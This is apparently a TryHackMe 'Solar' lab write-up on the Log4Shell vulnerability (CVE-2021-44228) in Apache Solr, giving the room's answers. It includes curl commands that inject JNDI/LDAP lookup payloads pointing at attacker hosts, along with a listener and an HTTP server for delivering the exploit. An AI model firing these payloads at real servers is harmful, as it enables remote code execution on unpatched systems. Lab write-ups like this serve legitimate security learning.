Skip to content

Exploiting log4j | TryHackMe Solar Write Up

CVE-2021-44228 Apache Solr 8.11.1

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ nmap solar.thm -p- -sC -sV

What service is running on port 8983? (Just the name of the software)

Apache Solr

Open the service running on port 8983 in your browser:

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ firefox http://solar.thm:8983
SOLR GUI

What is the -Dsolr.log.dir argument set to, displayed on the front page?

/var/solr/logs

Which file includes contains this repeated entry? (Just the filename itself, no path needed)

solr.log

What “path” or URL endpoint is indicated in these repeated entries?

/admin/cores

Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name)

params
┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ curl 'http://solar.thm:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.154.49:9999\}'

What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections)

Listening on 0.0.0.0:1389
curl 'http://10.10.29.51:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.82.86:1389/Exploit\}'
python3 -m http.server

What is the full path of the specific solr.in.sh file?

/etc/default/solr.in.sh

https://tryhackme.com/room/solar